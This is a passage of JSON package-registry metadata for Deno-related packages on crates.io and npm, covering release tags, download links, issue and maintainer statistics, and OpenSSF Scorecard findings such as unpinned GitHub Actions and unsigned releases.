:"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T09:39:12.063Z","dependent_packages_count":0,"downloads":3032,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":97.62815400232019,"dependent_repos_count":29.16183294663573,"dependent_packages_count":34.44025522041763,"stargazers_count":null,"forks_count":null,"average":53.74341405645785},"purl":"pkg:cargo/deno_cli_lib_windmill","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli_lib_windmill","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli_lib_windmill","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli_lib_windmill/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_lib_windmill/codemeta","maintainers":[{"uuid":"205717","login":"rubenfiszel","name":"Ruben Fiszel","email":null,"url":"https://github.com/rubenfiszel","packages_count":3,"html_url":"https://crates.io/users/rubenfiszel","role":null,"created_at":"2023-04-01T15:24:08.308Z","updated_at":"2023-04-01T15:24:08.308Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/rubenfiszel/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11161880,"name":"@deno/darwin-arm64","ecosystem":"npm","description":"darwin-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:25:03.180Z","latest_release_published_at":"2026-08-27T17:36:06.866Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:57:07.398Z","created_at":"2024-12-12T22:00:15.730Z","updated_at":"2026-08-29T21:57:07.399Z","registry_url":"https://www.npmjs.com/package/@deno/darwin-arm64","install_command":"npm install @deno/darwin-arm64","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using 